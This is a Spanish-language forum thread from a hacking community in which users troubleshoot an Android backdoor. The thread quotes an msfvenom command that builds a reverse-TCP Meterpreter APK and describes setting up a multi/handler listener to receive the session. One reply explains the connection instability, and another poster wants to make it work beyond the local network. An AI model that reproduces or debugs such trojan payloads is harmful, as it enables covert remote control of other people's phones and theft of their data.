comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Problema con backdoor metasploit

• 3 Respuestas
  • 1360 Vistas

Desconectado DammZ

• *
  • Underc0der
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Enero 03, 2017, 01:29:11 pm »
Bueno, mi problema es que al crear un backdoor para android (.apk) con el siguiente comando en la terminal de kali linux (VMWare Station) msfvenom -p android/meterpreter/reverse_tcp LHOST= Ip de ifconfig LPORT=5555 > virusdeprueba.apk

Hasta ahí todo bien, luego descargo el .apk en mi dispositivo móvil conectado a la misma red, por lo que no creo que haya que abrir puertos, antes de eso me voy a msfconsole y configuro todo usando multi/handler con el payload, lport y lhost y le pongo exploit, luego abro la apk y no me sale ninguna sesión , además la apk pasa a llamarse MainActivity con el robot verde de android como icono

Si hay que abrir puertos ensenme como abrirlos pls
« Última modificación: Enero 03, 2017, 01:48:37 pm por Gabriela »

Desconectado d0r127

• *
  • Underc0der
  • Actividad:
    0%
  • Reputación 1
  • Sin hocico y paranoico
    • Ver Perfil
« Respuesta #1 en: Enero 03, 2017, 02:41:55 pm »
You are not allowed to view links. Register or Login
Bueno, mi problema es que al crear un backdoor para android (.apk) con el siguiente comando en la terminal de kali linux (VMWare Station) msfvenom -p android/meterpreter/reverse_tcp LHOST= Ip de ifconfig LPORT=5555 > virusdeprueba.apk

Hasta ahí todo bien, luego descargo el .apk en mi dispositivo móvil conectado a la misma red, por lo que no creo que haya que abrir puertos, antes de eso me voy a msfconsole y configuro todo usando multi/handler con el payload, lport y lhost y le pongo exploit, luego abro la apk y no me sale ninguna sesión , además la apk pasa a llamarse MainActivity con el robot verde de android como icono

la APK que creas tiene una conexion muy poco inestable, yo realiza la prueba hace bastante ya y la conexion se perdia a los pocos segundos,al estar en local no hace falta que abras los puertos.
Te dejo un par de links a ver si te pueden ayudar :)

Desconectado bebepsp

• *
  • Underc0der
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Enero 04, 2017, 05:22:34 pm »
Me paso lo mismo ami no conectava y me De sencante yo quiero aprender aserlo fuera de la red

Enviado desde mi SM-G900V mediante Tapatalk

Desconectado DammZ

• *
  • Underc0der
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Enero 04, 2017, 06:02:01 pm »

la APK que creas tiene una conexion muy poco inestable, yo realiza la prueba hace bastante ya y la conexion se perdia a los pocos segundos,al estar en local no hace falta que abras los puertos.
Te dejo un par de links a ver si te pueden ayudar :)

Vale muchas gracias por tu ayuda, a ver si puedo arreglarlo

¿Te gustó el post? COMPARTILO!

[SOLUCIONADO] Problema con Softice 4.05 Help, SoftICE is not active.

Iniciado por d3vilz5

Respuestas: 1
Vistas: 1626
Último mensaje Mayo 17, 2013, 11:52:31 pm
por Krapermors
Problema con conexión de troyano pierdo la conexion

Iniciado por Nitro_X_Net

Respuestas: 6
Vistas: 1485
Último mensaje Julio 13, 2015, 03:35:57 am
por .:UND3R:.
AVs CMLS Registry workshop.. Problema.! "Otra vez yo"

Iniciado por Zobek

Respuestas: 0
Vistas: 942
Último mensaje Julio 11, 2016, 06:19:19 pm
por Zobek
[SOLUCIONADO] Problema con el systemd en MJ (systemd-modules-load.service)

Iniciado por Thereldor

Respuestas: 1
Vistas: 834
Último mensaje Abril 05, 2016, 11:50:05 pm
por Thereldor
Booteo en Dell Inspiron Mini "problema"

Iniciado por KnarBlack

Respuestas: 2
Vistas: 502
Último mensaje Febrero 19, 2018, 11:44:52 pm
por KnarBlack